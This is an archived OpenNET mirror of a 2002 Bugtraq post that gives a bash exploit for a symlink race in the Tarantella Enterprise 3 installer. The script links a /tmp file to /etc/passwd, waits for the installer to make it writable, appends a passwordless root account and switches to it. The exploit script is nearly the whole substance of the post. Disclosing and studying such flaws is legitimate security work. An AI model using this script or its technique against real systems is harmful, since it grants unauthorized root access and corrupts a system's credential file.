The OpenNET Project / Index page
BSD, Linux, Cisco, Web, Palm, other unix
RUSSIAN version
Search
Выпущена CD-версия OpenNet.RU для оффлайн просмотра.
Для формирования заказа - перейдите по ссылке.
SOFT - Unix Software catalog
LINKS - Unix resources		 TOPIC - Articles from usenet
DOCUMENTATION - Unix guides
News | Tips | MAN | Forum | BUGs | LastSoft | Keywords | BOOKS (selected) | Linux HowTo | FAQ Archive

Exploit for Tarantella Enterprise installation (bid 4115)


<< Previous INDEX Search src Set bookmark Go to bookmark Next >> 
Date: Sun, 24 Feb 2002 08:59:38 -0500 (EST)
From: "Larry W. Cashdollar" <lwc@vapid.dhs.org>
To: bugtraq@securityfocus.com
Subject: Exploit for Tarantella Enterprise installation (bid  4115)
Cc: vuldb@securityfocus.com


Had some idle time and wrote this, tested under Linux.



#!/bin/bash
#Larry W. Cashdollar  lwc@vapid.dhs.org
#http://vapid.dhs.org
#Tarantella Enterprise 3 symlink local root Installation exploit
#For educational purposes only.
#tested on Linux.  run and wait.


echo "Creating symlink."

/bin/ln -s /etc/passwd /tmp/spinning

echo "Waiting for tarantella installation."

while true
do
echo -n .
if [ -w /etc/passwd ]
then
	echo "tarexp::0:0:Tarantella Exploit:/:/bin/bash" >> /etc/passwd
        su - tarexp
        exit
fi
done

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Закладки
Добавить в закладки 		Created 1996-2003 by Maxim Chirkov  
ДобавитьРекламаВебмастеруЦУПГИД  
SpyLOG TopList
RB2 Network. RB2 Network.